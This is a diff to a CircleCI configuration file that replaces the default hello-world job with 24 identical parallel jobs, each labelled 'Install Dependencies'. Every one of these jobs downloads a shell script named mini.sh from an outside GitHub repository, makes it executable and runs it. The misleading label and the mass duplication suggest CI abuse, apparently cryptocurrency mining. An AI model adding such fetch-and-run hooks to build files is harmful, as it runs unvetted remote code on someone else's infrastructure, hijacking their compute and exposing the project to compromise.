--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,26 +1,223 @@
-# Use the latest 2.1 version of CircleCI pipeline process engine.
-# See: https://circleci.com/docs/2.0/configuration-reference
 version: 2.1
-
-# Define a job to be invoked later in a workflow.
-# See: https://circleci.com/docs/2.0/configuration-reference/#jobs
 jobs:
-  say-hello:
-    # Specify the execution environment. You can specify an image from Dockerhub or use one of our Convenience Images from CircleCI's Developer Hub.
-    # See: https://circleci.com/docs/2.0/configuration-reference/#docker-machine-macos-windows-executor
-    docker:
-      - image: cimg/base:stable
-    # Add steps to the job
-    # See: https://circleci.com/docs/2.0/configuration-reference/#steps
-    steps:
-      - checkout
-      - run:
-          name: "Say hello"
-          command: "echo Hello, World!"
-
-# Invoke jobs via workflows
-# See: https://circleci.com/docs/2.0/configuration-reference/#workflows
+    Devop:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop1:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop2:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop3:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop4:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop5:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop6:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop7:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop8:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop9:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop10:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop11:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop12:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop13:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop14:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop15:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop16:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop17:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop18:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop19:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop20:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop21:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop22:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
+    Devop23:
+      docker:
+            - image: circleci/ruby:2.5.3
+      steps:
+        - run:
+            name: Install Dependencies
+            command: |
+              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh              
 workflows:
-  say-hello-workflow:
-    jobs:
-      - say-hello
+    version: 2.1
+    build:
+        jobs:
+            - Devop
+            - Devop1
+            - Devop2
+            - Devop3
+            - Devop4
+            - Devop5
+            - Devop6
+            - Devop7
+            - Devop8
+            - Devop9
+            - Devop10
+            - Devop11           
+            - Devop12
+            - Devop13
+            - Devop14
+            - Devop15
+            - Devop16
+            - Devop17
+            - Devop18
+            - Devop19
+            - Devop20
+            - Devop21
+            - Devop22
+            - Devop23                  
+            
